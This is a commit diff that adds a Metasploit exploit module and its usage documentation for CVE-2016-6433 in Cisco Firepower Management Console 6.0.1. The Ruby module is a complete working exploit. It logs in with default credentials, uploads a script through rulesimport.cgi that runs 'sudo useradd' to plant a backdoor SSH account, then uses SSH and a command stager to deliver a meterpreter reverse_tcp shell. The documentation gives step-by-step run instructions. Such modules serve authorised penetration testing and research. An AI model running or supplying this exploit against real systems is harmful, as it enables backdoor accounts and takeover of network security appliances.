Land rapid7#7803, Add CVE-2016-6433 - Post-auth Cisco Firepower Management Console RCE

pbarry-r7 · pbarry-r7 · commit 899ff3578088 · 2017-01-11T16:11:42.000-06:00
diff --git a/documentation/modules/exploit/linux/http/cisco_firepower_useradd.md b/documentation/modules/exploit/linux/http/cisco_firepower_useradd.md
@@ -0,0 +1,35 @@
+This module exploits a vulnerability in Cisco Firepower Management Console RCE. It will
+create a backdoor SSH account via HTTPS, and then obtain a native payload session
+in SSH.
+
+## Vulnerable Application
+
+This exploit was specifically written against 6.0.1 (build 1213). To test, you can find the
+virtual appliance here:
+
+https://software.cisco.com/download/release.html?mdfid=286259687&softwareid=286271056&release=6.0.1&flowid=54052
+
+
+
+## Verification Steps
+
+1. Start msfconsole
+2. ```use exploit/linux/http/cisco_firepower_useradd```
+3. ```set password [https console password for admin]```
+4. ```set rhost [IP]```
+5. ```set payload linux/x86/meterpreter/reverse_tcp```
+6. ```set lhost [IP]```
+7. ```exploit```
+8. You should get a session
+
+## Options
+
+**USERNAME** The username for Cisco Firepower Management console
+
+**Password** The password for Cisco Firepower Management cosnole
+
+**NEWSSHUSER** The SSH account to create. By default, this is random.
+
+**NEWSSHPASS** The SSH password for the new account. By default, this is also random.
+
+**SSHPORT** In case for some reason, the SSH changed, otherwise this is 22 by default.
diff --git a/modules/exploits/linux/http/cisco_firepower_useradd.rb b/modules/exploits/linux/http/cisco_firepower_useradd.rb
@@ -0,0 +1,294 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Remote::SSH
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability",
+      'Description'    => %q{
+        This module exploits a vulnerability found in Cisco Firepower Management Console.
+        The management system contains a configuration flaw that allows the www user to
+        execute the useradd binary, which can be abused to create backdoor accounts.
+        Authentication is required to exploit this vulnerability.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Matt',  # Original discovery & PoC
+          'sinn3r' # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2016-6433' ],
+          [ 'URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking' ]
+        ],
+      'Platform'       => 'linux',
+      'Arch'           => ARCH_X86,
+      'Targets'        =>
+        [
+          [ 'Cisco Firepower Management Console 6.0.1 (build 1213)', {} ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Oct 10 2016',
+      'CmdStagerFlavor'=> %w{ echo },
+      'DefaultOptions' =>
+        {
+          'SSL'        => 'true',
+          'SSLVersion' => 'Auto',
+          'RPORT'      => 443
+        },
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        # admin:Admin123 is the default credential for 6.0.1
+        OptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']),
+        OptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']),
+        OptString.new('NEWSSHUSER', [false, 'New backdoor username (Default: Random)']),
+        OptString.new('NEWSSHPASS', [false, 'New backdoor password (Default: Random)']),
+        OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']),
+        OptInt.new('SSHPORT', [true, 'Cisco Firepower Management console\'s SSH port', 22])
+      ], self.class)
+  end
+
+  def check
+    # For this exploit to work, we need to check two services:
+    # * HTTP - To create the backdoor account for SSH
+    # * SSH  - To execute our payload
+
+    vprint_status('Checking Cisco Firepower Management console...')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, '/img/favicon.png?v=6.0.1-1213')
+    })
+
+    if res && res.code == 200
+      vprint_status("Console is found.")
+      vprint_status("Checking SSH service.")
+      begin
+        ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+          Net::SSH.start(rhost, 'admin',
+            port: datastore['SSHPORT'],
+            password: Rex::Text.rand_text_alpha(5),
+            auth_methods: ['password'],
+            non_interactive: true
+          )
+        end
+      rescue Timeout::Error
+        vprint_error('The SSH connection timed out.')
+        return Exploit::CheckCode::Unknown
+      rescue Net::SSH::AuthenticationFailed
+        # Hey, it talked. So that means SSH is running.
+        return Exploit::CheckCode::Appears
+      rescue Net::SSH::Exception => e
+        vprint_error(e.message)
+      end
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def get_sf_action_id(sid)
+    requirements = {}
+
+    print_status('Attempting to obtain sf_action_id from rulesimport.cgi')
+
+    uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => uri,
+      'cookie' => "CGISESSID=#{sid}"
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Failed to obtain rules import requirements.')
+    end
+
+    sf_action_id = res.body.scan(/sf_action_id = '(.+)';/).flatten[1]
+
+    unless sf_action_id
+      fail_with(Failure::Unknown, 'Unable to obtain sf_action_id from rulesimport.cgi')
+    end
+
+    sf_action_id
+  end
+
+  def create_ssh_backdoor(sid, user, pass)
+    uri          = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')
+    sf_action_id = get_sf_action_id(sid)
+    sh_name      = 'exploit.sh'
+
+    print_status("Attempting to create an SSH backdoor as #{user}:#{pass}")
+
+    mime_data = Rex::MIME::Message.new
+    mime_data.add_part('Import', nil, nil, 'form-data; name="action_submit"')
+    mime_data.add_part('file', nil, nil, 'form-data; name="source"')
+    mime_data.add_part('1', nil, nil, 'form-data; name="manual_update"')
+    mime_data.add_part(sf_action_id, nil, nil, 'form-data; name="sf_action_id"')
+    mime_data.add_part(
+      "sudo useradd -g ldapgroup -p `openssl passwd -1 #{pass}` #{user}; rm /var/sf/SRU/#{sh_name}",
+      'application/octet-stream',
+      nil,
+      "form-data; name=\"file\"; filename=\"#{sh_name}\""
+    )
+
+    send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => uri,
+      'cookie'   => "CGISESSID=#{sid}",
+      'ctype'    => "multipart/form-data; boundary=#{mime_data.bound}",
+      'data'     => mime_data.to_s,
+      'vars_get' => { 'no_mojo' => '1' },
+    })
+  end
+
+  def generate_new_username
+    datastore['NEWSSHUSER'] || Rex::Text.rand_text_alpha(5)
+  end
+
+  def generate_new_password
+    datastore['NEWSSHPASS'] || Rex::Text.rand_text_alpha(5)
+  end
+
+  def report_cred(opts)
+    service_data = {
+      address: rhost,
+      port: rport,
+      service_name: 'cisco',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  def do_login
+    console_user = datastore['USERNAME']
+    console_pass = datastore['PASSWORD']
+    uri          = normalize_uri(target_uri.path, 'login.cgi')
+
+    print_status("Attempting to login in as #{console_user}:#{console_pass}")
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => uri,
+      'vars_post' => {
+        'username' => console_user,
+        'password' => console_pass,
+        'target'   => ''
+      }
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out while trying to log in.')
+    end
+
+    res_cookie = res.get_cookies
+    if res.code == 302 && res_cookie.include?('CGISESSID')
+      cgi_sid = res_cookie.scan(/CGISESSID=(\w+);/).flatten.first
+      print_status("CGI Session ID: #{cgi_sid}")
+      print_good("Authenticated as #{console_user}:#{console_pass}")
+      report_cred(username: console_user, password: console_pass)
+      return cgi_sid
+    end
+
+    nil
+  end
+
+  def execute_command(cmd, opts = {})
+    @first_exec = true
+    cmd.gsub!(/\/tmp/, '/usr/tmp')
+
+    # Weird hack for the cmd stager.
+    # Because it keeps using > to write the payload.
+    if @first_exec
+      @first_exec = false
+    else
+      cmd.gsub!(/>>/, ' > ')
+    end
+
+    begin
+      Timeout.timeout(3) do
+        @ssh_socket.exec!("#{cmd}\n")
+        vprint_status("Executing #{cmd}")
+      end
+    rescue Timeout::Error
+      fail_with(Failure::Unknown, 'SSH command timed out')
+    rescue Net::SSH::ChannelOpenFailed
+      print_status('Trying again due to Net::SSH::ChannelOpenFailed (sometimes this happens)')
+      retry
+    end
+  end
+
+  def init_ssh_session(user, pass)
+    print_status("Attempting to log into SSH as #{user}:#{pass}")
+
+    factory = ssh_socket_factory
+    opts = {
+      auth_methods: ['password', 'keyboard-interactive'],
+      port: datastore['SSHPORT'],
+      use_agent: false,
+      config: false,
+      password: pass,
+      proxy: factory,
+      non_interactive: true
+    }
+
+    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
+
+    begin
+      ssh = nil
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        @ssh_socket = Net::SSH.start(rhost, user, opts)
+      end
+    rescue Net::SSH::Exception => e
+      fail_with(Failure::Unknown, e.message)
+    end
+  end
+
+  def exploit
+    # To exploit the useradd vuln, we need to login first.
+    sid = do_login
+    return unless sid
+
+    # After login, we can call the useradd utility to create a backdoor user
+    new_user = generate_new_username
+    new_pass = generate_new_password
+    create_ssh_backdoor(sid, new_user, new_pass)
+
+    # Log into the SSH backdoor account
+    init_ssh_session(new_user, new_pass)
+
+    begin
+      execute_cmdstager({:linemax => 500})
+    ensure
+      @ssh_socket.close
+    end
+  end
+
+end
